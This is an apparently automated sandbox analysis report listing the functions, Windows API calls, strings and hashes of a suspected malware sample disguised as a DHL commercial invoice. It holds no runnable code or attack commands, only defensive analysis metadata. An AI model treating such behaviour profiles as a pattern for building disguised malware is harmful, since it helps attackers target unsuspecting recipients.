Opcode Fuzzy Hash: b5b1eb9e33ccbd759866b8d7458ca3a81743c3328503a30bbf22b4ee2bd035c7
Instruction Fuzzy Hash: 61113931C21629E7CF10AFA8E9996EEBF78FF0A711F4140AADA41B2185CB709650CB51

Function 012A2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 012A2DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 012A2DD6
GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000), ref: 012A2DDD
AttachThreadInput.USER32(00000000,?,00000000), ref: 012A2DE4

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: fc866e40a421e3cd5750ddc46bacc7acd56b6a41a2faeec582b2738181a7b39a
Instruction ID: a523dbfb44b38f350fdd2dba7ed141dafc9229a03ccc62f893b3149070c374a1
Opcode Fuzzy Hash: fc866e40a421e3cd5750ddc46bacc7acd56b6a41a2faeec582b2738181a7b39a
Instruction Fuzzy Hash: 89E09271912624BBDB302A76EC0EFEB3E6CEF83BA1F400019F605D10819AA4D440C7F0

Function 012D8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 01259639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 01259693
Part of subcall function 01259639: SelectObject.GDI32(?,00000000), ref: 012596A2
Part of subcall function 01259639: BeginPath.GDI32(?), ref: 012596B9
Part of subcall function 01259639: SelectObject.GDI32(?,00000000), ref: 012596E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 012D8887
LineTo.GDI32(?,?,?), ref: 012D8894
EndPath.GDI32(?), ref: 012D88A4
StrokePath.GDI32(?), ref: 012D88B2

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 29d845a2826a8295004994da47c473c021306ec0a2b8f3d0cd88b650dc64ae3f
Instruction ID: c640469126d010a9f42b8514201bfe304e2676f3708ac36d09bd515ccf6be000
Opcode Fuzzy Hash: 29d845a2826a8295004994da47c473c021306ec0a2b8f3d0cd88b650dc64ae3f
Instruction Fuzzy Hash: 11F03A36456259BAEB225EA4EC0EFDA3E59AF06311F048004FB11650D5C7755161CBE5

Function 012598B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 012598CC
SetTextColor.GDI32(?,?), ref: 012598D6
SetBkMode.GDI32(?,00000001), ref: 012598E9
GetStockObject.GDI32(00000005), ref: 012598F1

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 37dbede8abff415efeb88f7335885c790e9ce1f2d774dc35016019aea26337b0
Instruction ID: c2b7746a056b7e838f81a8f059cd4e152a62bb7ed661c50699e6736a09666881
Opcode Fuzzy Hash: 37dbede8abff415efeb88f7335885c790e9ce1f2d774dc35016019aea26337b0
Instruction Fuzzy Hash: 82E03931651291AAEF215B78F80DBE83F20AB02336F04821AFBFA580D5C3718260DF10

Function 012A162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,012A1089,?,?,?,012A11D9), ref: 012A1634
OpenThreadToken.ADVAPI32(00000000,?,?,?,012A11D9), ref: 012A163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,012A11D9), ref: 012A1648
OpenProcessToken.ADVAPI32(00000000,?,?,?,012A11D9), ref: 012A164F

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 02463852f1df4a452130bd1b1ad7b10726ec89b7471343b397290665a5aec377
Instruction ID: 159074984f27ef7fb00c1473a53429d7f2592dec2b1f52a173759b85ba4171af
Opcode Fuzzy Hash: 02463852f1df4a452130bd1b1ad7b10726ec89b7471343b397290665a5aec377
Instruction Fuzzy Hash: BFE08631A032119BD7301FE4FE0DB463B7CAF45BA2F14480CF385C9084D6344050C750

Function 0129D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0129D858
GetDC.USER32(00000000), ref: 0129D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0129D882
ReleaseDC.USER32(?), ref: 0129D8A3

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: f28d9c3ecf00d7208718cdfbbd07a4eef1a0d72b7ee819c6278070dc70589454
Instruction ID: 610623e7edc636b36b1bed8a8a4f689017d8219607c936b7c677c1da81203a75
Opcode Fuzzy Hash: f28d9c3ecf00d7208718cdfbbd07a4eef1a0d72b7ee819c6278070dc70589454
Instruction Fuzzy Hash: 48E01AB0C21205DFCF519FE4E40C66DBBB1FB48311B148009E856E7244C7795921DF80

Function 0129D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0129D86C
GetDC.USER32(00000000), ref: 0129D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0129D882
ReleaseDC.USER32(?), ref: 0129D8A3

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 3d4b78e56666c4b7610e480747f053ad3fcb9698b4da7a6cdd4a704df857df3e
Instruction ID: 51cb2d4211713ef6b75a6a518cb9eccc21e7ad19f5a890702fa808ae13c3349a
Opcode Fuzzy Hash: 3d4b78e56666c4b7610e480747f053ad3fcb9698b4da7a6cdd4a704df857df3e
Instruction Fuzzy Hash: 73E04F70C11204DFCF609FA0E40C66DBBB1FB48311B14800DE956E7244C7396921DF80

Function 012B4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 01247620: _wcslen.LIBCMT ref: 01247625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 012B4ED4

Strings

LPT, xrefs: 012B4DFB
*, xrefs: 012B4E10

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 61fb11cb10c5a062630bae7af352c71c85324996d2338858ca50c0502955dbb1
Instruction ID: 919b52615774687359f5397d39fb1006ecfbd9d7a73677b095dbf39ffd54e4d0
Opcode Fuzzy Hash: 61fb11cb10c5a062630bae7af352c71c85324996d2338858ca50c0502955dbb1
Instruction Fuzzy Hash: 14918075A102459FDB15EF58C4C4EAABBF1EF48344F188099E90A9F362C771ED85CB90

Function 0126E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0126E30D

Strings

pow, xrefs: 0126E2E5, 0126E302

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 4bad7e421d97a67bdc54cc120b735fcf7b5ee346d7e845d635327cd151665f3c
Instruction ID: beaf2511f28d571d2e05d26dd7ac94309d343dac061dfa80faeaa33a5ce18844
Opcode Fuzzy Hash: 4bad7e421d97a67bdc54cc120b735fcf7b5ee346d7e845d635327cd151665f3c
Instruction Fuzzy Hash: 0C519E75A34103D7DB26B72CC90937B3F9CEB40740F244D68E296862DDDB3088D58B86

Function 0125E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0125E1B1

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 472118fb07a4787c61fad285c58418b8b48c3b9cbe1a9cdfb0adc1f39dde8ba2
Instruction ID: 2ac21c6f1d4b41bf68e95153ef293a5f02997d04290bb4c15fb2713c0d1dce81
Opcode Fuzzy Hash: 472118fb07a4787c61fad285c58418b8b48c3b9cbe1a9cdfb0adc1f39dde8ba2
Instruction Fuzzy Hash: F9510035924247DFEF19DF6CC0816FEBBA4EF25310F254059EE519B2D0D6309A82CBA1

Function 0125F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0125F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0125F2BB

Strings

@, xrefs: 0125F2AF

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: e1b71dd383d980bf86f42c68f7baab6939f79d3760258a28eee5818b0ea692f8
Instruction ID: 19fd712b656f31474a791a17847d164fb9e8f0419dcfe8794706bdf10efa2005
Opcode Fuzzy Hash: e1b71dd383d980bf86f42c68f7baab6939f79d3760258a28eee5818b0ea692f8
Instruction Fuzzy Hash: F55165714197459BD320AF54E885BBBBBF8FF94300F81885DF5D941094EB318538CB66

Function 012C5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 012C57E0
_wcslen.LIBCMT ref: 012C57EC

Strings

CALLARGARRAY, xrefs: 012C57E6, 012C57EB

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 716ee09b7fe3034b6ecad423c9bcac4551664555045eaf7825b9489d8310f50e
Instruction ID: f1382e2730a22f0691ac0780ea32969f1c761224728596d8052b4a756cb8bd12
Opcode Fuzzy Hash: 716ee09b7fe3034b6ecad423c9bcac4551664555045eaf7825b9489d8310f50e
Instruction Fuzzy Hash: 3941A131E2010A9FCB14DFA8C8818BEBBB5FF58754F54426DE605A7291E730E981CBA0

Function 012BD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 012BD130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 012BD13A

Strings

|, xrefs: 012BD10B

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 549d0418b89a63940bb438e2ad9610b70b106d4612a21ca736b2755fc6a34288
Instruction ID: 75318187dbd760793b38a725c561746c33b166a730dfc397d4d4a9ec973191f0
Opcode Fuzzy Hash: 549d0418b89a63940bb438e2ad9610b70b106d4612a21ca736b2755fc6a34288
Instruction Fuzzy Hash: BB317071D2120AABDF15EFE4CC84EEE7FB9FF15344F000019E915A6165D731AA56CB50

Function 012D356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 012D3621
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 012D365C

Strings

static, xrefs: 012D35BC

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 0df60f806142fb1925a4024d27534a289f18b18afb0ca5d1a2aa8cfe73046df5
Instruction ID: 2a78a43b1df9e14cff5fa1ad31a30230e55d2ae0ce8c6f07d70f1670129644c2
Opcode Fuzzy Hash: 0df60f806142fb1925a4024d27534a289f18b18afb0ca5d1a2aa8cfe73046df5
Instruction Fuzzy Hash: B931A4B1120605AEDB24DF38DC40EFB73A9FF88720F00961DF9A597180DA31E891D765

Function 012D4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 012D461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 012D4634

Strings

', xrefs: 012D458E

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 633616f8562ec0485a7dd92b0e781c7410784ebbf67884d4108465d9e2fcb0c1
Instruction ID: 98d56fa5e7470fa35757c41b683f6f7df0f1f161ad789c4c569440dc4d3757b1
Opcode Fuzzy Hash: 633616f8562ec0485a7dd92b0e781c7410784ebbf67884d4108465d9e2fcb0c1
Instruction Fuzzy Hash: 0D314874A1024A9FDF14DFA9D981BDABBB5FF09300F50406AEA05AB781D770A901CF90

Function 012D31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 012D327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 012D3287

Strings

Combobox, xrefs: 012D3249

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 3d4dd4c6798fc93c23d0d31e128ef1572e9aa056abe37f7bed623e5146156e11
Instruction ID: cec6157f83699c03fa0a9557b024890c5e47c1b432690a561815a4e38d565b34
Opcode Fuzzy Hash: 3d4dd4c6798fc93c23d0d31e128ef1572e9aa056abe37f7bed623e5146156e11
Instruction Fuzzy Hash: A211B6B17201097FFF26DE58DC88EBB3B6AFB84364F104128FA1897291D6719C51C761

Function 012D3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0124600E: CreateWindowExW.USER32 ref: 0124604C
Part of subcall function 0124600E: GetStockObject.GDI32(00000011), ref: 01246060
Part of subcall function 0124600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0124606A

GetWindowRect.USER32(00000000,?), ref: 012D377A
GetSysColor.USER32 ref: 012D3794

Strings

static, xrefs: 012D3757

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: c07c023cc88f09a5b4134e5441e7a8937dd0e2de868b05470641786b18e5cbed
Instruction ID: 4f31d01a2b50830dc5b1d997702eb1aa96513ba1e2b21943cbf2102459980933
Opcode Fuzzy Hash: c07c023cc88f09a5b4134e5441e7a8937dd0e2de868b05470641786b18e5cbed
Instruction Fuzzy Hash: 97112CB262060AAFEF11DFB8D845AFA7BB8FB08354F014518F955E2240D775E860DB50

Function 012BCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 012BCD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 012BCDA6

Strings

<local>, xrefs: 012BCD66

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: c99824d6c031592ae6173d249d5b37f6c3028467a1f7dc23bb5c418532d12506
Instruction ID: ed87643d13327d965a05b1f5e5c501afab600e6641be4815f984cc4f7076b092
Opcode Fuzzy Hash: c99824d6c031592ae6173d249d5b37f6c3028467a1f7dc23bb5c418532d12506
Instruction Fuzzy Hash: 0A11C6756256337AD7394A668C89EE7BEACEF527E4F40422AB25983180D7709860C6F0

Function 012D3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32 ref: 012D34AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 012D34BA

Strings

edit, xrefs: 012D348F

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 2ac0340e431f79a5935d6e86f9f922b8a8d07a6fc2cf9c7edc152b9608a06eaf
Instruction ID: cf667190fecd429f43f73690b38c6272f22b8f500dd9f4631d8c3a88687481c5
Opcode Fuzzy Hash: 2ac0340e431f79a5935d6e86f9f922b8a8d07a6fc2cf9c7edc152b9608a06eaf
Instruction Fuzzy Hash: 6B11BFB5120109AFEB228E68EC44AFB3B6AFB05374F504324FA60931D4C779DC519B52

Function 012A6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 01249CB3: _wcslen.LIBCMT ref: 01249CBD

CharUpperBuffW.USER32(?,?), ref: 012A6CB6
_wcslen.LIBCMT ref: 012A6CC2

Strings

STOP, xrefs: 012A6CBC, 012A6CC1

